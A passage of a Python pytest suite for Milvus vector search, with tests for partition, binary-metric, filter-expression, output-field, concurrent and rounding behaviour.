def test_search_collection_multiple_times(self, nb, nq, dim, auto_id, _async):
"""
target: test search for multiple times
method: search for multiple times
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search for multiple times
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
for i in range(search_num):
log.info("test_search_collection_multiple_times: searching round %d" % (i + 1))
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_sync_async_multiple_times(self, nb, nq, dim, auto_id):
"""
target: test async search after sync search case
method: create connection, collection, insert,
sync search and async search
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:5]
# 2. search
log.info("test_search_sync_async_multiple_times: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
for i in range(search_num):
log.info("test_search_sync_async_multiple_times: searching round %d" % (i + 1))
for _async in [False, True]:
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_multiple_vectors(self, nb, nq, dim, auto_id, _async):
"""
target: test search with multiple vectors
method: create connection, collection with multiple
vectors, insert and search
expected: search successfully with limit(topK)
"""
# 1. connect
self._connect()
# 2. create collection with multiple vectors
c_name = cf.gen_unique_str(prefix)
fields = [cf.gen_int64_field(is_primary=True), cf.gen_float_field(),
cf.gen_float_vec_field(dim=dim), cf.gen_float_vec_field(name="tmp", dim=dim)]
schema = cf.gen_collection_schema(fields=fields, auto_id=auto_id)
collection_w = self.collection_wrap.init_collection(c_name, schema=schema,
check_task=CheckTasks.check_collection_property,
check_items={"name": c_name, "schema": schema})[0]
# 3. insert
vectors = [[random.random() for _ in range(dim)] for _ in range(nb)]
vectors_tmp = [[random.random() for _ in range(dim)] for _ in range(nb)]
data = [[i for i in range(nb)], [np.float32(i) for i in range(nb)], vectors, vectors_tmp]
if auto_id:
data = [[np.float32(i) for i in range(nb)], vectors, vectors_tmp]
res = collection_w.insert(data)
insert_ids = res.primary_keys
assert collection_w.num_entities == nb
# 4. load
collection_w.load()
# 5. search all the vectors
log.info("test_search_multiple_vectors: searching collection %s" % collection_w.name)
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
collection_w.search(vectors[:nq], "tmp",
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_one_partition(self, nb, auto_id, _async):
"""
target: test search from partition
method: search from one partition
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
is_index=True)[0:5]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search in one partition
log.info("test_search_index_one_partition: searching (1000 entities) through one partition")
limit = 1000
par = collection_w.partitions
if limit > par[1].num_entities:
limit_check = par[1].num_entities
else:
limit_check = limit
search_params = {"metric_type": "L2", "params": {"nprobe": 128}}
collection_w.search(vectors[:default_nq], default_search_field,
search_params, limit, default_search_exp,
[par[1].name], _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids[par[0].num_entities:],
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partitions(self, nb, nq, dim, auto_id, _async):
"""
target: test search from partitions
method: search from partitions
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
dim=dim,
is_index=True)[0:4]
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search through partitions
log.info("test_search_index_partitions: searching (1000 entities) through partitions")
par = collection_w.partitions
log.info("test_search_index_partitions: partitions: %s" % par)
limit = 1000
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit, default_search_exp,
[par[0].name, par[1].name], _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("partition_names",
[["(.*)"], ["search(.*)"]])
def test_search_index_partitions_fuzzy(self, nb, nq, dim, partition_names, auto_id, _async):
"""
target: test search from partitions
method: search from partitions with fuzzy
partition name
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num=1,
auto_id=auto_id,
dim=dim)[0:4]
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search through partitions
log.info("test_search_index_partitions_fuzzy: searching through partitions")
limit = 1000
limit_check = limit
par = collection_w.partitions
if partition_names == ["search(.*)"]:
insert_ids = insert_ids[par[0].num_entities:]
if limit > par[1].num_entities:
limit_check = par[1].num_entities
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit, default_search_exp,
partition_names, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_partition_empty(self, nq, dim, auto_id, _async):
"""
target: test search the empty partition
method: search from the empty partition
expected: searched successfully with 0 results
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, auto_id=auto_id,
dim=dim, is_index=True)[0]
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
# 2. create empty partition
partition_name = "search_partition_empty"
collection_w.create_partition(partition_name=partition_name, description="search partition empty")
par = collection_w.partitions
log.info("test_search_index_partition_empty: partitions: %s" % par)
collection_w.load()
# 3. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 4. search the empty partition
log.info("test_search_index_partition_empty: searching %s "
"entities through empty partition" % default_limit)
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, [partition_name],
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index", ["BIN_FLAT", "BIN_IVF_FLAT"])
def test_search_binary_jaccard_flat_index(self, nq, dim, auto_id, _async, index):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with JACCARD
expected: the return distance equals to the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids, time_stamp = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)[0:5]
# 2. create index
default_index = {"index_type": index, "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
collection_w.load()
# 3. compute the distance
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.jaccard(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.jaccard(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "JACCARD", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0].distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index", ["BIN_FLAT", "BIN_IVF_FLAT"])
def test_search_binary_hamming_flat_index(self, nq, dim, auto_id, _async, index):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with HAMMING
expected: the return distance equals to the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)[0:4]
# 2. create index
default_index = {"index_type": index, "params": {"nlist": 128}, "metric_type": "HAMMING"}
collection_w.create_index("binary_vector", default_index)
# 3. compute the distance
collection_w.load()
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.hamming(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.hamming(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "HAMMING", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0].distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6843")
@pytest.mark.parametrize("index", ["BIN_FLAT", "BIN_IVF_FLAT"])
def test_search_binary_tanimoto_flat_index(self, nq, dim, auto_id, _async, index):
"""
target: search binary_collection, and check the result: distance
method: compare the return distance value with value computed with TANIMOTO
expected: the return distance equals to the computed value
"""
# 1. initialize with binary data
collection_w, _, binary_raw_vector, insert_ids = self.init_collection_general(prefix, True, 2,
is_binary=True,
auto_id=auto_id,
dim=dim,
is_index=True)[0:4]
log.info("auto_id= %s, _async= %s" % (auto_id, _async))
# 2. create index
default_index = {"index_type": index, "params": {"nlist": 128}, "metric_type": "TANIMOTO"}
collection_w.create_index("binary_vector", default_index)
collection_w.load()
# 3. compute the distance
query_raw_vector, binary_vectors = cf.gen_binary_vectors(3000, dim)
distance_0 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[0])
distance_1 = cf.tanimoto(query_raw_vector[0], binary_raw_vector[1])
# 4. search and compare the distance
search_params = {"metric_type": "TANIMOTO", "params": {"nprobe": 10}}
res = collection_w.search(binary_vectors[:nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": 2,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert abs(res[0].distances[0] - min(distance_0, distance_1)) <= epsilon
@pytest.mark.tag(CaseLabel.L2)
def test_search_without_expression(self, auto_id):
"""
target: test search without expression
method: 1. create connections,collection
2. first insert, and return with timestamp1
3. second insert, and return with timestamp2
4. search before timestamp1 and timestamp2
expected: 1 data inserted at a timestamp could not be searched before it
2 data inserted at a timestamp could be searched after it
"""
# 1. create connection, collection and insert
nb = 10
collection_w, _, _, insert_ids_1, time_stamp_1 = \
self.init_collection_general(prefix, True, nb, auto_id=auto_id, dim=default_dim)[0:5]
# 2. insert for the second time
log.info("test_search_without_expression: inserting for the second time")
_, entities, _, insert_ids_2, time_stamp_2 = cf.insert_data(collection_w, nb, auto_id=auto_id,
dim=default_dim, insert_offset=nb)[0:5]
# 3. extract vectors inserted for the second time
entities_list = np.array(entities[0]).tolist()
vectors = [entities_list[i][-1] for i in range(default_nq)]
# 4. search with insert timestamp1
log.info("test_search_without_expression: searching collection %s with time_stamp_1 '%d'"
% (collection_w.name, time_stamp_1))
search_res = collection_w.search(vectors, default_search_field,
default_search_params, default_limit,
travel_timestamp=time_stamp_1,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids_1,
"limit": default_limit})[0]
log.info("test_search_without_expression: checking that data inserted "
"after time_stamp_2 is not searched at time_stamp_1")
for i in range(len(search_res)):
assert insert_ids_2[i] not in search_res[i].ids
# 5. search with insert timestamp2
time.sleep(gracefulTime)
log.info("test_search_without_expression: searching collection %s with time_stamp_2 '%d'"
% (collection_w.name, time_stamp_2))
log.info(time_stamp_2)
search_res = collection_w.search(vectors, default_search_field,
default_search_params, default_limit,
travel_timestamp=time_stamp_2,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids_1 + insert_ids_2,
"limit": default_limit})[0]
log.info("test_search_without_expression: checking that data inserted "
"after time_stamp_2 is searched at time_stamp_2")
for i in range(len(search_res)):
assert insert_ids_2[i] in search_res[i].ids
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("expression", cf.gen_normal_expressions())
def test_search_with_expression(self, dim, expression, _async):
"""
target: test search with different expressions
method: test search with different expressions
expected: searched successfully with correct limit(topK)
"""
# 1. initialize with data
nb = 1000
collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True,
nb, dim=dim,
is_index=True)[0:4]
# filter result with expression in collection
_vectors = _vectors[0]
expression = expression.replace("&&", "and").replace("||", "or")
filter_ids = []
for i, _id in enumerate(insert_ids):
int64 = _vectors.int64[i]
float = _vectors.float[i]
if not expression or eval(expression):
filter_ids.append(_id)
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
collection_w.load()
# 3. search with expression
log.info("test_search_with_expression: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": min(nb, len(filter_ids)),
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
filter_ids_set = set(filter_ids)
for hits in search_res:
ids = hits.ids
assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 7910")
@pytest.mark.parametrize("bool_type", [True, False, "true", "false", 1, 0, 2])
def test_search_with_expression_bool(self, dim, auto_id, _async, bool_type):
"""
target: test search with different bool expressions
method: search with different bool expressions
expected: searched successfully with correct limit(topK)
"""
# 1. initialize with data
nb = 1000
collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)[0:4]
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
collection_w.load()
# 3. filter result with expression in collection
filter_ids = []
bool_type_cmp = bool_type
if bool_type == "true":
bool_type_cmp = True
if bool_type == "false":
bool_type_cmp = False
for i, _id in enumerate(insert_ids):
if _vectors[0][f"{default_bool_field_name}"][i] == bool_type_cmp:
filter_ids.append(_id)
# 4. search with different expressions
expression = f"{default_bool_field_name} == {bool_type}"
log.info("test_search_with_expression_bool: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": min(nb, len(filter_ids)),
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
filter_ids_set = set(filter_ids)
for hits in search_res:
ids = hits.ids
assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("expression", cf.gen_normal_expressions_field(default_float_field_name))
def test_search_with_expression_auto_id(self, dim, expression, _async):
"""
target: test search with different expressions
method: test search with different expressions with auto id
expected: searched successfully with correct limit(topK)
"""
# 1. initialize with data
nb = 1000
collection_w, _vectors, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=True,
dim=dim,
is_index=True)[0:4]
# filter result with expression in collection
_vectors = _vectors[0]
expression = expression.replace("&&", "and").replace("||", "or")
filter_ids = []
for i, _id in enumerate(insert_ids):
exec(f"{default_float_field_name} = _vectors.{default_float_field_name}[i]")
if not expression or eval(expression):
filter_ids.append(_id)
# 2. create index
index_param = {"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}}
collection_w.create_index("float_vector", index_param)
collection_w.load()
# 3. search with different expressions
log.info("test_search_with_expression_auto_id: searching with expression: %s" % expression)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
search_res, _ = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, nb, expression,
_async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": min(nb, len(filter_ids)),
"_async": _async})
if _async:
search_res.done()
search_res = search_res.result()
filter_ids_set = set(filter_ids)
for hits in search_res:
ids = hits.ids
assert set(ids).issubset(filter_ids_set)
@pytest.mark.tags(CaseLabel.L2)
def test_search_expression_all_data_type(self, nb, nq, dim, auto_id, _async):
"""
target: test search using different supported data type
method: search using different supported data type
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
log.info("test_search_expression_all_data_type: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
search_exp = "int64 >= 0 && int32 >= 0 && int16 >= 0 " \
"&& int8 >= 0 && float >= 0 && double >= 0"
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
search_exp, _async=_async,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert (default_int64_field_name and default_float_field_name) in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields_empty(self, nb, nq, dim, auto_id, _async):
"""
target: test search with output fields
method: search with empty output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
log.info("test_search_with_output_fields_empty: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_field(self, auto_id, _async):
"""
target: test search with output fields
method: search with one output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True,
auto_id=auto_id)[0:4]
# 2. search
log.info("test_search_with_output_field: Searching collection %s" % collection_w.name)
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[default_int64_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert default_int64_field_name in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields(self, nb, nq, dim, auto_id, _async):
"""
target: test search with output fields
method: search with multiple output_field
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
is_all_data_type=True,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
log.info("test_search_with_output_fields: Searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
res = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=[default_int64_field_name,
default_float_field_name],
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert (default_int64_field_name and default_float_field_name) in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("output_fields", [["*"], ["*", default_float_field_name]])
def test_search_with_output_field_wildcard(self, output_fields, auto_id, _async):
"""
target: test search with output fields using wildcard
method: search with one output_field (wildcard)
expected: search success
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True,
auto_id=auto_id)[0:4]
# 2. search
log.info("test_search_with_output_field_wildcard: Searching collection %s" % collection_w.name)
res = collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
output_fields=output_fields,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})[0]
if _async:
res.done()
res = res.result()
assert len(res[0][0].entity._row_data) != 0
assert (default_int64_field_name and default_float_field_name) in res[0][0].entity._row_data
@pytest.mark.tags(CaseLabel.L2)
def test_search_multi_collections(self, nb, nq, dim, auto_id, _async):
"""
target: test search multi collections of L2
method: add vectors into 10 collections, and search
expected: search status ok, the length of result
"""
self._connect()
collection_num = 10
for i in range(collection_num):
# 1. initialize with data
log.info("test_search_multi_collections: search round %d" % (i + 1))
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_multi_collections: searching %s entities (nq = %s) from collection %s" %
(default_limit, nq, collection_w.name))
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_concurrent_multi_threads(self, nb, nq, dim, auto_id, _async):
"""
target: test concurrent search with multi-processes
method: search with 10 processes, each process uses dependent connection
expected: status ok and the returned vectors should be query_records
"""
# 1. initialize with data
threads_num = 10
threads = []
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
auto_id=auto_id,
dim=dim)[0:5]
def search(collection_w):
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
# 2. search with multi-processes
log.info("test_search_concurrent_multi_threads: searching with %s processes" % threads_num)
for i in range(threads_num):
t = threading.Thread(target=search, args=(collection_w,))
threads.append(t)
t.start()
time.sleep(0.2)
for t in threads:
t.join()
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("round_decimal", [0, 1, 2, 3, 4, 5, 6])
def test_search_round_decimal(self, round_decimal):
"""
target: test search with invalid round decimal
method: search with invalid round decimal
expected: raise exception and report the error
"""
import math
tmp_nb = 500
tmp_nq = 1
tmp_limit = 5
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, nb=tmp_nb)[0]
# 2. search
log.info("test_search_round_decimal: Searching collection %s" % collection_w.name)
res, _ = collection_w.search(vectors[:tmp_nq], default_search_field,
default_search_params, tmp_limit)
res_round, _ = collection_w.search(vectors[:tmp_nq], default_search_field,
default_search_params, tmp_limit, round_decimal=round_decimal)
abs_tol = pow(10, 1 - round_decimal)
# log.debug(f'abs_tol: {abs_tol}')
for i in range(tmp_limit):
dis_expect = round(res[0][i].distance, round_decimal)
dis_actual = res_round[0][i].distance
# log.debug(f'actual: {dis_actual}, expect: {dis_expect}')
# abs(a-b) <= max(rel_tol * max(abs(a), abs(b)), abs_tol)
assert math.isclose(dis_actual, dis_expect, rel_tol=0, abs_tol=abs_tol)
"""
******************************************************************
# The following cases are copied from test_search.py
******************************************************************
"""
def init_data(connect, collection, nb=3000, partition_names=None, auto_id=True):
"""
Generate entities and add it in collection
"""
global entities
if nb == 3000:
insert_entities = entities
else:
insert_entities = gen_entities(nb, is_normal=True)
if partition_names is None:
res = connect.insert(collection, insert_entities)
else:
res = connect.insert(collection, insert_entities, partition_name=partition_names)
connect.flush([collection])
ids = res.primary_keys
return insert_entities, ids
def init_binary_data(connect, collection, nb=3000, insert=True, partition_names=None):
"""
Generate entities and add it in collection
"""
ids = []
global binary_entities
global raw_vectors
if nb == 3000:
insert_entities = binary_entities
insert_raw_vectors = raw_vectors
else:
insert_raw_vectors, insert_entities = gen_binary_entities(nb)
if insert is True:
if partition_names is None:
res = connect.insert(collection, insert_entities)
else:
res = connect.insert(collection, insert_entities, partition_name=partition_names)
connect.flush([collection])
ids = res.primary_keys
return insert_raw_vectors, insert_entities, ids
def check_id_result(result, id):
limit_in = 5
ids = [entity.id for entity in result]
if len(result) >= limit_in:
return id in ids[:limit_in]
else:
return id in ids
class TestSearchBase:
"""
generate valid create_index params
"""
@pytest.fixture(
scope="function",
params=gen_index()
)
def get_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return copy.deepcopy(request.param)
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_jaccard_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
# else:
# pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_hamming_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] in binary_support():
return request.param
# else:
# pytest.skip("Skip index Temporary")
@pytest.fixture(
scope="function",
params=gen_binary_index()
)
def get_structure_index(self, request, connect):
logging.getLogger().info(request.param)
if request.param["index_type"] == "FLAT":
return request.param
# else:
# pytest.skip("Skip index Temporary")
"""
generate top-k params
"""
@pytest.fixture(
scope="function",
params=[1, 10]
)
def get_top_k(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=[1, 10, 1100]
)
def get_nq(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_search_flat_top_k(self, connect, collection, get_nq):
"""
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
"""
top_k = 16385 # max top k is 16384
nq = get_nq
entities, ids = init_data(connect, collection)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, **query)
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
else:
with pytest.raises(Exception) as e:
connect.search(collection, **query)
@pytest.mark.skip("r0.3-test")
def _test_search_field(self, connect, collection, get_top_k, get_nq):
"""
target: test basic search function, all the search params is correct, change top-k value
method: search with the given vectors, check the result
expected: the length of the result is top_k
"""
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection)
query, _ = gen_search_vectors_params(field_name, entities, top_k, nq)
if top_k <= max_top_k:
connect.load_collection(collection)
res = connect.search(collection, **query, fields=["float_vector"])
assert len(res[0]) == top_k
assert res[0]._distances[0] <= epsilon
assert check_id_result(res[0], ids[0])
res = connect.search(collection, **query, fields=["float"])
for i in range(nq):
assert entities[1]["values"][:nq][i] in [r.entity.get('float') for r in res[i]]
else:
with pytest.raises(Exception):
connect.search(collection, **query)
def _test_search_after_delete(self, connect, collection, get_top_k, get_nq):
"""
target: test basic search function before and after deletion, all the search params is
correct, change top-k value.
check issue <a href="https://github.com/milvus-io/milvus/issues/4200">#4200</a>
method: search with the given vectors, check the result
expected: the deleted entities do not exist in the result.
"""
top_k = get_top_k
nq = get_nq
entities, ids = init_data(connect, collection, nb=10000)
first_int64_value = entities[0]["values"][0]
first_vector = entities[2]["values"][0]
search_param = get_search_param("FLAT")
query, vecs = gen_search_vectors_params(field_name, entities, top_k, nq, search_params=search_param)
vecs[:] = []
vecs.append(first_vector)
res = None
if top_k > max_top_k:
with pytest.raises(Exception):
connect.search(collection, **query, fields=['int64'])
# pytest.skip("top_k value is larger than max_topp_k")
pass
else:
res = connect.search(collection, **query, fields=['int64'])
assert len(res) == 1
assert len(res[0]) >= top_k
assert res[0][0].id == ids[0]
assert res[0][0].entity.get("int64") == first_int64_value
assert res[0]._distances[0] < epsilon
assert check_id_result(res[0], ids[0])
connect.delete_entity_by_id(collection, ids[:1])
connect.flush([collection])
res2 = connect.search(collection, **query, fields=['int64'])
assert len(res2) == 1
assert len(res2[0]) >= top_k
assert res2[0][0].id != ids[0]
if top_k > 1:
assert res2[0][0].id == res[0][1].id
assert res2[0][0].entity.get("int64") == res[0][1].entity.get("int64")
@pytest.mark.tags(CaseLabel.L2)
def test_search_index_empty_partition(self, connect, collection, get_simple_index, get_top_k, get_nq):
"""
target: test basic search function, all the search params is correct, test all index params, and build
method: add vectors into collection, search with the given vectors, check the result
expected: the length of the result is top_k, search collection with partition tag return empty
"""
